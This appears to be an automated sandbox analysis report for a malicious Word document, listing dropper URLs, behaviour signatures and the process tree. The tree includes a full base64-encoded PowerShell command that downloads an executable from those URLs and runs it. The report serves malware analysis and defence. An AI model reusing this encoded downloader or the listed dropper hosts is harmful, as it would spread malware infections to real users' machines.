Overview

overview

10

task1

 

10

Analysis

  • max time kernel
    30s
  • resource
    win10v191014
  • submitted
    31-01-2020 08:04

Sharing

Copy URL
Twitter E-mail

General

  • Target

    12f17aa88c41cd66c648d4f19289192958e721c494829eb67962060967d804be.doc

  • Sample

    200131-z13g4b8vrx

  • SHA256

    12f17aa88c41cd66c648d4f19289192958e721c494829eb67962060967d804be

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://alea.ir/f4k/1v/
exe.dropper

http://www.baptist.sumy.ua/irardpxot/h/
exe.dropper

http://baptist.sumy.ua/irardpxot/dtkv158/
exe.dropper

http://www.ecoleannedeguigne.fr/wp-admin/x61n9/
exe.dropper

http://goldengarden.com.br/cgi-bin/ty/

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\12f17aa88c41cd66c648d4f19289192958e721c494829eb67962060967d804be.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Checks processor information in registry
    • Enumerates system info in registry
    PID:4968
  • C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exe
    PoWERsheLL -e JABLAGUAawB6AGsAcgByAHUAZwBtAD0AJwBFAGwAbgBlAGkAbwBtAHAAJwA7ACQAWQBoAGQAaABrAHoAagByAHoAIAA9ACAAJwA3ADIAMgAnADsAJABZAHQAZQBvAHYAbAB1AGsAcQBnAD0AJwBSAGsAeQBsAGsAbgBmAHEAJwA7ACQARABvAHYAdQB5AHcAYgBlAHoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFkAaABkAGgAawB6AGoAcgB6ACsAJwAuAGUAeABlACcAOwAkAEYAegB2AHcAdQBhAGQAbgBqAHQAegB2AGwAPQAnAEMAdgBpAG0AYgBpAHYAbgBoACcAOwAkAE4AdQBmAHQAdQBoAGIAdAA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBlAFQALgBXAGUAYgBDAGwASQBFAG4AdAA7ACQARQBrAG8AcABpAGgAegBqAHoAaABrAG4AdQA9ACcAaAB0AHQAcAA6AC8ALwBhAGwAZQBhAC4AaQByAC8AZgA0AGsALwAxAHYALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAGEAcAB0AGkAcwB0AC4AcwB1AG0AeQAuAHUAYQAvAGkAcgBhAHIAZABwAHgAbwB0AC8AaAAvACoAaAB0AHQAcAA6AC8ALwBiAGEAcAB0AGkAcwB0AC4AcwB1AG0AeQAuAHUAYQAvAGkAcgBhAHIAZABwAHgAbwB0AC8AZAB0AGsAdgAxADUAOAAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGUAYwBvAGwAZQBhAG4AbgBlAGQAZQBnAHUAaQBnAG4AZQAuAGYAcgAvAHcAcAAtAGEAZABtAGkAbgAvAHgANgAxAG4AOQAvACoAaAB0AHQAcAA6AC8ALwBnAG8AbABkAGUAbgBnAGEAcgBkAGUAbgAuAGMAbwBtAC4AYgByAC8AYwBnAGkALQBiAGkAbgAvAHQAeQAvACcALgAiAHMAUABgAGwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASwBjAGIAYgBtAHUAbgB6AG4AZQBzAHkAPQAnAEgAZAB3AHcAZQB2AHoAcwBmAGgAcgB4ACcAOwBmAG8AcgBlAGEAYwBoACgAJABRAHgAYgBpAHYAZgBrAGQAYwAgAGkAbgAgACQARQBrAG8AcABpAGgAegBqAHoAaABrAG4AdQApAHsAdAByAHkAewAkAE4AdQBmAHQAdQBoAGIAdAAuACIAZABPAFcAbgBsAG8AYQBkAGAARgBgAGkAYABMAEUAIgAoACQAUQB4AGIAaQB2AGYAawBkAGMALAAgACQARABvAHYAdQB5AHcAYgBlAHoAKQA7ACQAUQBrAG0AbgBhAGEAcQBhAGwAaABoAGUAPQAnAFMAYgBrAHgAcgBzAHUAZgB5AHIAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABEAG8AdgB1AHkAdwBiAGUAegApAC4AIgBMAGAARQBuAEcAdABIACIAIAAtAGcAZQAgADIAMgA0ADEAOQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwByAGAAZQBBAHQAZQAiACgAJABEAG8AdgB1AHkAdwBiAGUAegApADsAJABSAHgAdABrAHAAcQB1AGkAZABzAGUAeQA9ACcASAByAG8AcABhAG8AbgBhACcAOwBiAHIAZQBhAGsAOwAkAFUAZgBsAHoAbABsAHUAawB6AGYAeQBjAHMAPQAnAE4AbgBkAG8AaQBmAHkAYQBwAG0AbgBqACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE0AaAByAHQAdwBwAGoAZQA9ACcAUwB4AHUAeQBsAGUAZQB6AHIAeABtAGEAagAnAA==
    1⤵
    • Process spawned unexpected child process
    PID:4596

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads